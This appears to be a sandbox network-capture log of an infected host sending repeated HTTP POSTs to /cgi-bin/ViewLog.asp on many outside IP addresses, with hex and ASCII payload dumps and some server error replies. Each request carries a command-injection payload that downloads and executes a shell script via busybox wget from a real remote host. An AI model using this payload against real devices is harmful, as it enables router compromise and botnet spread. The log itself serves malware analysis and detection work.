Feb 14, 2024 09:29:36.953922033 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:38.201913118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:40.889852047 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.009800911 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:55.993462086 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:16.728864908 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.687884092 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
306	192.168.2.15	48918	95.248.153.152	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.347821951 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
307	192.168.2.15	56278	94.122.15.8	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.367290974 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
308	192.168.2.15	54716	94.122.225.23	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.369230032 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
309	192.168.2.15	54522	94.121.137.210	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.370779037 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
310	192.168.2.15	58140	31.216.62.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.398684978 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:36.674557924 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:36 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
311	192.168.2.15	60908	95.164.242.252	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.442742109 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:36.562195063 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/3.5.27 Mime-Version: 1.0 Date: Wed, 14 Feb 2024 08:29:36 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3556 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ubuntu X-Cache-Lookup: NONE from ubuntu:8080 Via: 1.1 ubuntu (squid/3.5.27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port
312	192.168.2.15	44556	31.136.156.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.544382095 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:37.210005045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:38.553956032 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.401782036 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.777870893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:57.529315948 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:20.824717045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:03.835387945 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
313	192.168.2.15	60170	62.91.14.26	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:36.554934978 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:36.783418894 CET	1094	IN	HTTP/1.1 404 Not Found Connection: close Server: TEST Date: Wed, 14 Feb 2024 08:29:35 GMT Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 69 65 68 65 72 31 37 38 31 41 57 20 2d 20 45 72 72 6f 72 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 6c 6f 67 69 6e 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 20 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 6e 63 6f 6d 2d 73 79 73 74 65 6d 73 2e 64 65 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 69 6d 67 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 72 6f 64 75 63 74 73 76 67 2e 73 76 67 22 20 61 6c 74 3d 22 4c 41 4e 43 4f 4d 20 53 79 73 74 65 6d 73 20 48 6f 6d 65 70 61 67 65 22 3e 3c 2f 61 3e 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 70 22 3e 4c 41 4e 43 4f 4d 20 31 37 38 31 41 57 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 63 6f 6e 74 65 6e 74 20 64 75 6c 6c 45 72 72 6f 72 22 3e 0d 0a 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 59 6f 75 20 61 73 6b 65 64 20 66 6f 72 20 61 20 55 52 4c 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 70 3e 0d 0a 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 61 63 74 69 6f 6e 3d 22 2f 22 20 3e 0d 0a 3c 64 69 76 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 50 61 67 65 4c 69 6e 6b 22 20 61 63 63 65 73 73 6b 65 79 3d 22 62 22 20 6f 6e 63 6c 69 63 6b 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 27 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 26 71 75 6f 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 26 71 75 